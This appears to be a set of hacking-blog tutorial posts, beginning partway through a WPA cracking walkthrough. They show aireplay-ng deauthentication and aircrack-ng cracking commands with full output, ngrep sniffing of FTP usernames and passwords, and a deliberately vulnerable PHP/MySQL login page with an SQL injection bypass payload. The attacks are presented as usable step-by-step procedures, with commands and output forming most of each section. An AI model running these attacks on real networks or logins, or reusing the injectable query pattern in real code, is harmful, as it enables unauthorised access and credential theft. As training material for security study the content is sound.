root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:50 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:51 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [185|179 ACKs]
root@bt:~#

Excellent, as you can see we managed to capture the WPA Handshake, let’s crack it and get the WPA passphrase we can then use to connect to the wireless network:

CH 6 ][ Elapsed: 32 s ][ 2010-06-20 19:44 ][ WPA handshake: 00:0C:41:9D:C7:5C


root@bt:~# aircrack-ng -a 2 -b 00:0C:41:9D:C7:5C -e HackMe -w password.txt HackMe-Demo-01.cap
Opening HackMe-Demo-01.cap
Reading packets, please wait...



Aircrack-ng 1.1 r1729


[00:00:00] 4 keys tested (67.32 k/s)


KEY FOUND! [ password ]


Master Key : 52 EC 07 C0 95 E6 7B 26 DD 40 59 67 10 7C F6 F7
BE EF E6 66 8D 70 A6 1C 56 BE F5 DD A2 B8 5D 32

Transient Key : 41 3E E2 11 47 CA DA EC 39 FA B8 23 79 4C 01 6A
AC B3 C0 45 FE 62 3F BF 4F 0A A9 B0 63 A1 AC 2E
D4 9C C6 09 C1 A9 82 A8 68 1B 71 BC 65 72 BE 97
C6 A8 2F A9 12 DA 08 C6 73 A5 90 DD E9 EF 5F 66

EAPOL HMAC : CA E1 1F 29 45 9A 1D 5D 1B 25 BF 51 92 1A 95 A9
root@bt:~#

Yay! We got the passphrase, which was “password”

I was playing with a neat little tool the other day called, ngrep. Or Network Grep. It basically takes the functionality of the GNU grep utility and puts it to use on network layer packets The following is a paragraph from the man page which helps sum it up better:

grep strives to provide most of GNU grep's common features, applying them to the network layer. ngrep is a pcap-aware tool that will allow you to specify extended regular expressions to match against data payloads of packets. It currently recognizes TCP, UDP and ICMP across Ethernet, PPP, SLIP, FDDI and null interfaces, and understands bpf filter logic in the same fashion as more common packet sniffing tools, such as tcpdump(8) and snoop(1).

Let’s take a quick look at one of the uses for ngrep that may seem attractive:

[zoidberg@/dev/null:~ ] $ sudo ngrep -d wlan0 -i 'USER|PASS' tcp port 21
interface: wlan0 (192.168.1.0/255.255.255.0)
filter: (ip or ip6) and ( tcp port 21 )
match: USER|PASS
############
T 192.168.1.68:39404 -> 130.89.149.226:21 [AP]
USER ftp..
##
T 130.89.149.226:21 -> 192.168.1.68:39404 [AP]
331 Please specify the password...
##
T 192.168.1.68:39404 -> 130.89.149.226:21 [AP]
PASS this.is.my@password.com..
############

Pretty neat huh? Another cool option worth looking into is -K (is kill matching TCP connections), however I will leave it up to your imagination to take it further… If you find a neat use for this tool then please leave a comment, anyway, until the next time, see ya!

I wrote a silly little PHP based authentication page. It uses a MySQL database to store the username and password, presents the user with a login prompt where they can enter their login credentials. If they don’t have any then they can take advantage of it using SQL Injection, let’s take a quick look at it. First you will need to create a MySQL database:

mysql> create table userauth (id TINYINT UNSIGNED NOT NULL AUTO_INCREMENT, username VARCHAR(16) NOT NULL, pswd VARCHAR(32) NOT NULL, PRIMARY KEY(id));
Query OK, 0 rows affected (0.00 sec)
mysql> insert into userauth (id, username, pswd) values (1, "zoidberg", "password");
Query OK, 1 row affected (0.00 sec)
mysql> select * from userauth;
+----+----------+----------+
| id | username | pswd |
+----+----------+----------+
| 1 | zoiddberg | password |
+----+----------+----------+
1 row in set (0.00 sec)
mysql>

Now to create the login page:

<?php
function authenticate_user()
{
header('WWW-Authenticate: Basic realm="Private Area"');
header("HTTP/1.0 401 Unauthorized");
exit;
}
if (!isset($_SERVER['PHP_AUTH_USER'])) {
authenticate_user();
} else {
mysql_connect("database_host", "database_username", "database_password") or die("Can't connect to the fucking database, blaaad!");
mysql_select_db("database_name") or die("Can't select da fucking database b0ss!");
$query = "SELECT username, pswd FROM table_name WHERE username='$_SERVER[PHP_AUTH_USER]' AND pswd='$_SERVER[PHP_AUTH_PW]'";
$result = mysql_query($query);
if (mysql_num_rows($result) == 0) {
authenticate_user();
} else {
echo "Welcome to the Private Area... ";
}
}
?>

Now to take advantage Navigate to the page in your browser, and enter the following in the username field:

' OR '1'='1'--

To understand this let’s take a look at the MySQL query:

$query = "SELECT username, pswd FROM table_name WHERE username='$_SERVER[PHP_AUTH_USER]' AND pswd='$_SERVER[PHP_AUTH_PW]'";

So that is what the query looks like, well when we inject ‘ OR ’1′=’1′– into the username field, it then looks like this:

$query = "SELECT username, pswd FROM table_name WHERE username='' OR '1'='1'-- AND pswd='$_SERVER[PHP_AUTH_PW]'";

Remember that — is a MySQL comment, so everything after it gets left out of the query that gets sent to the database. So our query which gets passed to the database looks like this:

$query = "SELECT username, pswd FROM table_name WHERE username='' OR '1'='1'--

What happens here is, select username and password from table_name where username is nothing OR true.. this will result in a successful login and give you access to the Private Area very simple and contrived example.